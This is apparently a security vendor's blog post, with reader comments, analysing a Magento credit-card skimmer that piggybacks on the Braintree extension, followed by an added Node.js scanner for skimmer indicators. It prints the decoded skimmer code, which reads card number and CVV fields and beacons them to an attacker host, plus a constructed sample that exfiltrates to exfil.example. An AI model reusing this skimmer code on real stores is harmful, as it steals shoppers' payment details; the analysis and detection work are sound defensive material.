We regularly find and write about malware that steals credit card details from Magento sites, because attackers discover new techniques to obtain sensitive data daily. This time, the malicious code is specifically designed for Magento sites that use the Braintree extension. This extension connects a Magento store with the Braintree payment processing service, which is supposed, among other things, to add extra security for credit card transactions. Ironically, the hackers piggyback on some of the Braintree objects in order to steal credit card details during the checkout process.
The obfuscated code was added in the js/varien/accordion.js file.
var _0x53bc = ["\x71\x20\x66\x3D\x45\x3B\x35\x3D\x27\x44\x27 \x3B\x43\x20…
Here’s what it looks like after decoding:
var se = false;
pf = 'gene_braintree_creditcard';
function timedMe() {
    if (payment['currentMethod']) pf = payment['currentMethod'];
    if ((!se) && (document.getElementById(pf + '_cc_number'))) {
        fln = document.getElementById('billing_firstname').value + ' ' + document.getElementById('billing_lastname').value;
        ...skipped...
        cn = document.getElementById(pf + '_cc_number').value.replace(/\s/g, '');
        cem = document.getElementById(pf + '_expiration').value;
        cey = document.getElementById(pf + '_expiration_yr').value;
        cvv = document.getElementById(pf + '_cc_cid').value;
        if ((cn.length == 16 && cvv.length == 3) || (cn.length == 15 && cvv.length == 4)) {
            se = true;
            var i = document.createElement('img');
            i.src = 'hxxps://scriptb[.]com/l2.php?p=197' + encodeURIComponent('&fln=' + fln + '&ct=' + ct + '&cn=' + cn + '&cem=' + cem + '&cey=' + cey + '&cvv=' + cvv + '&co=' + co + '&ci=' + ci + '&st=' + st + '&ad=' + ad + '&zp=' + zp)
        }
    }
}
setInterval('timedMe()', 700);
Roughly every second (every 700 ms, per the setInterval call), the timedMe function checks whether the order form has been completed, meaning the customer has entered a credit card number and CVV of plausible lengths, and then sends the entered data to a remote server. To locate the form fields, the malicious code uses the Braintree gene_braintree_creditcard object, which handles regular credit card payments. The extension also has a gene_braintree_paypal object for PayPal payments, but in this particular case the attackers are only interested in credit cards.
It's interesting how the hackers transfer the stolen sensitive data to their site. They dynamically build an image tag that links to the attacker-controlled "scriptb[.]com" site, passing all the stolen data in the image URL's query parameters (without even encrypting them).
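The behaviours described above (hex-escaped string obfuscation, a string-based setInterval poll, reads of the *_cc_number and *_cc_cid fields, and an image whose src carries form data to an external host) are easy to look for in a site's JavaScript files. The following Node.js scanner is an added example written for this post; it is not code from the original article, from Sucuri, or from the Braintree extension. The indicator names, the exfil.example host, and both sample snippets are constructed for the example; the decoder reverses the \xNN escaping used by the obfuscated sample, and the scoring threshold of three indicators is an assumed starting point, not a tuned value.

```javascript
// Added example: static scan of JavaScript source for card-skimmer indicators.
// Each indicator is one behaviour the decoded skimmer on the page exhibits.
const INDICATORS = [
  { name: 'polling-timer-string', re: /setInterval\s*\(\s*['"]/ },          // setInterval('fn()', ms)
  { name: 'card-number-field', re: /_cc_number/ },                           // reads the PAN field
  { name: 'cvv-field', re: /_cc_cid/ },                                      // reads the CVV field
  { name: 'image-beacon', re: /createElement\s*\(\s*['"]img['"]\s*\)/ },     // dynamic <img> for exfil
  { name: 'external-url-with-params', re: /https?:\/\/[^'"\s]+\?[^'"\s]*/ }, // absolute URL with a query
  { name: 'encodeuricomponent-exfil', re: /encodeURIComponent\s*\(\s*['"]&/ }, // query built from form values
];

// Turn "\xNN" and "\uNNNN" escapes back into the characters they encode,
// so the indicator patterns can be matched against the de-obfuscated text.
function decodeHexEscapes(src) {
  return src
    .replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Fraction of the raw source made up of \xNN escapes (4 characters each).
// Ordinary application code is close to 0; packed skimmers are close to 1.
function hexEscapeRatio(src) {
  const m = src.match(/\\x[0-9a-fA-F]{2}/g);
  return m ? (m.length * 4) / src.length : 0;
}

// Decode, match every indicator, and report. "suspicious" is an assumed
// threshold: three or more indicators in one file warrants a manual review.
function scanSource(src) {
  const decoded = decodeHexEscapes(src);
  const hits = INDICATORS.filter((i) => i.re.test(decoded)).map((i) => i.name);
  const ratio = hexEscapeRatio(src);
  if (ratio > 0.2) hits.push('heavy-hex-escaping');
  return { hits, hexEscapeRatio: ratio, suspicious: hits.length >= 3 };
}

// Constructed samples. The first mimics benign accordion code; the second is a
// shortened skimmer modelled on the decoded code above, with an example host.
const SAMPLE_CLEAN = "function initAccordion(el) { el.addEventListener('click', toggle); }";
const SAMPLE_SKIMMER_PLAIN =
  "var se=false;pf='gene_braintree_creditcard';function timedMe(){" +
  "cn=document.getElementById(pf+'_cc_number').value;" +
  "cvv=document.getElementById(pf+'_cc_cid').value;" +
  "var i=document.createElement('img');" +
  "i.src='https://exfil.example/l.php?p=1'+encodeURIComponent('&cn='+cn+'&cvv='+cvv);}" +
  "setInterval('timedMe()',700);";
// Obfuscate the skimmer the way the injected file was: every character as \xNN
// inside a string literal (constructed here so the scanner can be run offline).
const SAMPLE_SKIMMER_HEX =
  '"' +
  [...SAMPLE_SKIMMER_PLAIN]
    .map((c) => '\\x' + c.charCodeAt(0).toString(16).padStart(2, '0'))
    .join('') +
  '"';

console.log('clean  :', JSON.stringify(scanSource(SAMPLE_CLEAN)));
console.log('skimmer:', JSON.stringify(scanSource(SAMPLE_SKIMMER_HEX)));
```

To use it on a real store, read each file under js/ (and skin/, where the comments below report similar findings) and pass its contents to scanSource; files that come back suspicious, or with a high hexEscapeRatio, are the ones to diff against a known-good copy of the extension or theme.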
Other files could also contain this malicious code, or even different code that will re-add the injection back in the site even after the above is removed. If this happens, just contact us. We will be happy to answer any of your questions as well as inspect and clean the website.
This case shows that if your ecommerce site has a checkout form where customers enter their credit card details, there is no way to prevent data theft if your site is hacked. Even using trusted third-party payment processing services behind the scenes will not help – the data is being stolen before it reaches them. That’s why you should really consider redirecting customers to trusted third-party payment processing sites to complete transactions rather than having them enter credit card details on your site. If you have more questions about ecommerce security or specifically around how to account for PCI compliance let us know.
The same skimming method was used on our Magento shop (exploited via MAGMI) about 2 years ago. If I remember correctly, the i.src request wasn’t even an https request and even though our checkout was secure, no browsers kicked up any warnings about an insecure request being made, I assume because it was a 404. Pretty slick. Even if it was a 404, the request params would still end up in their log files for them to access at will. Very expensive lesson for us and the reason I found out about you guys. Keep up the good work!
Thanks for sharing, how did you find out you got hacked? Appreciate the feedback!
We were actually hacked pretty bad by more than one person.
Once we started receiving emails from customers about charges being made to new cards they only used at our website we ran a scan to search for files with escaped hex characters and found an obfuscated php web shell in /skin/install/mage_db.php.
One of them modified OnepageController.php and was storing details into our own database in a “salesrule_customer_item” table and another guy was skimming with the timedMe() approach shown above except it was added in js/varien/js.js and modified to grab cards from our checkout form.
We use the Paradoxlabs Authorize.net + CIM extension which thankfully spared most of our customers because their cards were already saved in the CIM at Authorize.
Is Stripe.js vulnerable to this type of attack, or is it as secure as an externally-hosted payment page?
Sucuri is really very useful plugin.
Haha wow… hackers continue to amaze me. Thanks for the post!
Not very good disclosure, much is missing.
First, responsible disclosure should contain instructions on how to secure a store against the attack.
Second, the disclosure should contain information on if and when the issue has been communicated to Magento and/or Braintree.
Third, it should make it clearer that the hackers *use* an issue in the Braintree extension to inject the code into the JS file. Because there is so little information in the post, it sounds a bit as if the Braintree extension itself contains that code or does it on its own.
Finally, the Twitter handle @mirphak is listed as a contact channel, but its tweets are protected, which pretty much only leaves Disqus as a public channel – and that is moderated. Communication around public disclosures should be open and transparent.
One of my websites has been compromised by this malware, so I confirm this malware is out there. In my case it attached to another payment extension, not Braintree.